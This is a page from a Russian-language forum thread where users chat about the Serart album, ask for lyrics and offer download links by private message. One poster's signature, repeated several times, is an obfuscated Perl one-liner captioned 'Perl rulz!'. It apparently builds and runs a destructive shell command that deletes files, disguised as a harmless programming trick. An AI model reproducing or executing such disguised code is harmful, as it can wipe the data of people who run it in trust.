Добавлено: Сб Июл 19, 2008 10:55 am Заголовок сообщения:
После Системы слушаю, расслабляет, особенно нравится "Devil's Wedding" и" Cinema"
Ксатати, никто не знает, где есть текст песен и перевод, буду признательна И нет ли клипов, каких нибудь?
Добавлено: Сб Янв 10, 2009 1:46 am Заголовок сообщения:
Я слушал. С системой не имеет ничего общего кроме Сержа. Но хорошая вещь. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Добавлено: Сб Янв 10, 2009 2:15 am Заголовок сообщения:
пишите кому еще надо я ссылку кину в личку _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Наконец то я послушал Serart .С системой там ничего общего и музыка эта конечно на любителя.Мне же понравилось,правда не то чтобы очень,но в целом хорошо.
Встань на одну ногу и кричи,как курица. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
и запиши на видео, ага _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
мне нравится. интересно слушать. хотя армянские напевы, которые там иногда звучат, мне как-то не очень. _________________ Freedom's just another word for nothin' left to lose.
Добавлено: Вс Фев 08, 2009 2:14 am Заголовок сообщения:
черт, я про него так и забыл, только сейчас слушаю _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
тебе только сам альбом? в личку кинуть или как? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Часовой пояс: GMT + 4 На страницу Пред.1, 2, 3След.
Страница 2 из 3